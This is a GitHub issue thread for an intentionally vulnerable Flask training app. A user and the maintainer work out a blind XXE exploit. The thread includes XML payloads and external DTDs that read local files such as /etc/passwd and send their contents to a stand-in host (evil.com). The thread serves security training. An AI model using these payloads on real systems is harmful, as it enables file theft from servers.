Write-up for vulnerabilities

[dugdug36]

Firstly thank you for this application.
Can you provide write-up of vulnerabilities ?.

For example i'm still stuck in XXE Injection :

]

&callhome;

@stephenbradshaw

[stephenbradshaw]

Hi dugdug36

Yes I suppose I could do that, might take me a little while to get around to it though.

In the meantime, as it turns out, the XXE item is broken on Python3. Im looking to convert this to run on python3 now with the issues fixed, once this is done you should hopefully be able to do the XXE one pretty easily - its pretty straightforward.

EDIT: Have just pushed an update which should fix the XXE issue on Python 3 - give this another go.

[dugdug36]

Ok, thanks i'm still blocked with this blind XXE.
I already done XXE in others platforms.
https://github.com/payloadbox/xxe-injection-payload-list

[stephenbradshaw]

Blind XXE doesn't work very well in that particular example, as any invalid characters in the source file (e.g. a newline or carriage return) will kill processing before any request is made in that particular XML library. You can get it to work using an external DTD (not an internal one as shown in the example on your linked page) IF you are reading a file with only characters used in legit URLs. Think more like this (but http instead of ftp): https://staaldraad.github.io/2016/12/11/xxeftp/

Try removing the try/except error handling block around the XML processing in the code ( https://github.com/stephenbradshaw/breakableflask/blob/master/main.py#L168 ) to look at error messages if you're stuck - you will then see in the console where you're running the web server what the problem is.

Also, non blind XXE should be pretty straightforward

[dugdug36]

Hello @stephenbradshaw
Sorry again, i try different away/encoding i'm still blocked :
Parser payload :

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://@evilServer:8000/ev.dtd">
    %ext;
]>
<message></message>

External ev.dtd :

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Evil server LOG :
[31/Jul/2020 13:05:07] "GET /ev.dtd HTTP/1.0" 200 -

Error message in server :

File "http://EvilServer:8000/ev.dtd", line 2
lxml.etree.XMLSyntaxError: Detected an entity reference loop, line 2, column 77

Can you help me please ?

[stephenbradshaw]

This will work, but as I said it's extremely finicky, and wont work if the target file has ANY characters not allowable in a URL - its so finicky that its not really usable as a proper attack, but if the target file meets the requirements it will read it.

XML XXE payload
<!DOCTYPE foo [<!ENTITY % xa SYSTEM "http://evil.com/evil.dtd"> %xa; %xb; ]><foo>&external;</foo>

DTD at evil.com/evil.dtd
<!ENTITY % f SYSTEM "file:///tmp/1">
<!ENTITY % xb "<!ENTITY external SYSTEM 'http://evil.com/?x=%f;'>">

For this to work, file /tmp/1 which you are trying to read has to be something very simple. This generates a workable file on my machine, by creating a file with the word "hello" in it, with NO ending newline.

python3 -c "open('/tmp/1', 'w').write('hello')"

[stephenbradshaw]

WRT the XXE injection issue, I might investigate if changing the app to use a different XML parser will allow this vulnerability to be exploited blind in a more realistic/usable fashion. I'll add an issue for myself as a reminder.